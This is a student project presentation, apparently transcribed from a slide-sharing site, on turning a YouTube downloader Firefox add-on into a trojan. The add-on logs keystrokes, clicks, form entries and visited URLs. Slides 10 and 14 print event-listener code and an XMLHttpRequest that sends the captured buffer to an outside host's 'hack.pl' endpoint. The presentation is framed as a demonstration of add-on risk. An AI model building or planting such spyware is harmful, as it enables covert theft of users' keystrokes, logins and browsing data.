A Simple Trojan Mozilla Firefox Add-on
•
1 recomendación•3,321 vistas
A Simple Trojan Mozilla Firefox Add-on - Our Project Presentation on how to make a Trojan Addon for Firefox. For Education Purpose Only. No one is encouraged to undergo unethical engineering. This is to show that there can be vulnerabilities. We have edited the GOOD existing addon and added some trojan code.
Recomendados
Recomendados
Más contenido relacionado
Similar a A Simple Trojan Mozilla Firefox Add-on
Similar a A Simple Trojan Mozilla Firefox Add-on (20)
Último
Último (20)
A Simple Trojan Mozilla Firefox Add-on
- 1. Presented by Suresh K Abin John George Nimish Joseph Bairaginath Behera Arunanand T A M.Tech. 2011-13 CSE, Dept. of CSE, NIT Calicut, Kerala, IN, 673 601
- 2. Introduction What’s an add-on? That adds some feature to the existing system What’s a Trojan? That looks useful, but does unfavorable actions without our knowledge 11/16/2011 Dept. of CSE, NIT Calicut 2
- 3. Overview Existing Add-on vs Ours Our Add-on: Features Challenges & Design Working as an abstraction Demonstration Conclusions References 11/16/2011 Dept. of CSE, NIT Calicut 3
- 4. Abstract Our add-on works as a normal YouTube video downloader, but it is a Trojan It will capture your web activities like URLs visited, web form entries, etc. and shall send to a remote server It will, at the server, identify and store the IPs of the hosts 11/16/2011 Dept. of CSE, NIT Calicut 4
- 5. Existing Add-on vs Our Add-on Easy YouTube Downloader [1] Helps download videos from YouTube We modified the source and added some js into the source 11/16/2011 Dept. of CSE, NIT Calicut 5
- 6. Features of our Add-on Still, works as YouTube Downloader Monitor click [2] and keyboard[2] events Sends all the URLs visited and events, which’s first stored in a buffer variable Keeps track of IP address of hosts, at the server 11/16/2011 Dept. of CSE, NIT Calicut 6
- 7. System Requirements Operating System: Windows/Linux Browser: Mozilla Firefox 1.5+ Javascript Enabled [3] 11/16/2011 Dept. of CSE, NIT Calicut 7
- 8. Challenges Understanding the working of existing add-on. Where and how to modify the add-on? How to add event listeners? How to send captured information to the remote server? 11/16/2011 Dept. of CSE, NIT Calicut 8
- 9. Design We added some blocks of codes into “script- compiler.js” file The following methods/functions were created: Two Event Listeners – KeyPress and Click to the window object sendHref(href) addKey(Event) clickBuff(Event) sendBUFF(BUFF) 11/16/2011 Dept. of CSE, NIT Calicut 9
- 10. Design – Contd… Two Event Listeners – KeyPress and Click to the window object WinObj.addEventListener("keypress", function(event){ BUFF.addKey(event); }, true); [4] WinObj.addEventListener("click", function(event){ CLICK.Event(event); }, true); [4] 11/16/2011 Dept. of CSE, NIT Calicut 10
- 11. Design – Contd… Retrieve href from window object sendHref(href) If href != "about:blank” then Add href to the buffer Call sendBuff() function 11/16/2011 Dept. of CSE, NIT Calicut 11
- 12. Design – Contd… addKey(Event) This is an key event handler function Once a key is pressed, this function will be automatically called (Callback function) From the Event object, we can extract key-press information Add this key to the buffer 11/16/2011 Dept. of CSE, NIT Calicut 12
- 13. Design – Contd… clickBuff (Event) Why we included this clickBuff()? This is a click event handler function Once a click happens, observe its click target Store the click target in buffer While submit event happens, we will fetch the target values of click events stored. 11/16/2011 Dept. of CSE, NIT Calicut 13
- 14. Design – Contd… sendBuff(buff) Using Ajax (XMLHttpRequest) If buff is full or submit event happens, buff is sent to the server var req = new XMLHttpRequest(); req.open("GET", "http://www.mamboo.in/cgi- bin/hack.pl?keys=" + hack, true); 11/16/2011 Dept. of CSE, NIT Calicut 14
- 15. Working as an abstraction 11/16/2011 Dept. of CSE, NIT Calicut 15
- 16. Server Side Set-up A Perl file for Receiving ‘buffer’ data Writes to the text file at the server $ENV{} hash of Perl (QUERY_STRING and REMOTE_ADDR) Timestamp and IP Information is retrieved and stored 11/16/2011 Dept. of CSE, NIT Calicut 16
- 17. As a package… Available as an .xpi package Open the file using Mozilla Firefox Restart, and start using 11/16/2011 Dept. of CSE, NIT Calicut 17
- 18. Demonstration We will now have a demonstration of our project http://www.youtube.com/watch?v=WiVZ8dI2stc 11/16/2011 Dept. of CSE, NIT Calicut 18
- 19. Future Enhancements We can enhance the server side for further processing of retrieved information Browser cookie details can be accessed 11/16/2011 Dept. of CSE, NIT Calicut 19
- 20. Conclusions The project aimed at creating a trojan add-on, which is successfully completed This project is intended for revealing the vulnerabilities caused by untrusted add-ons 11/16/2011 Dept. of CSE, NIT Calicut 20
- 21. References [1] https://addons.mozilla.org/ [2]https://developer.mozilla.org/En/Developing_add- ons [3] http://www.rietta.com/firefox/index.html [4] Kenneth C., Programming Firefox, O’Reilly, 2007 [5] http://www.google.com 11/16/2011 Dept. of CSE, NIT Calicut 21
- 22. Visit… Comprehensive details of our project is available at (Requires Login): https://sites.google.com/site/nitcmtech2013cs/semester -1/is-project-sem1/trojan Or shortly, http://tinyurl.com/taddon 11/16/2011 Dept. of CSE, NIT Calicut 22
- 23. Queries??? 11/16/2011 Dept. of CSE, NIT Calicut 23
- 24. Thank You… Contact: sureshk.gec@gmail.com abinjohn2008@gmail.com nimishjoseph@gmail.com mail2bairagi@gmail.com arunta007@gmail.com 11/16/2011 Dept. of CSE, NIT Calicut 24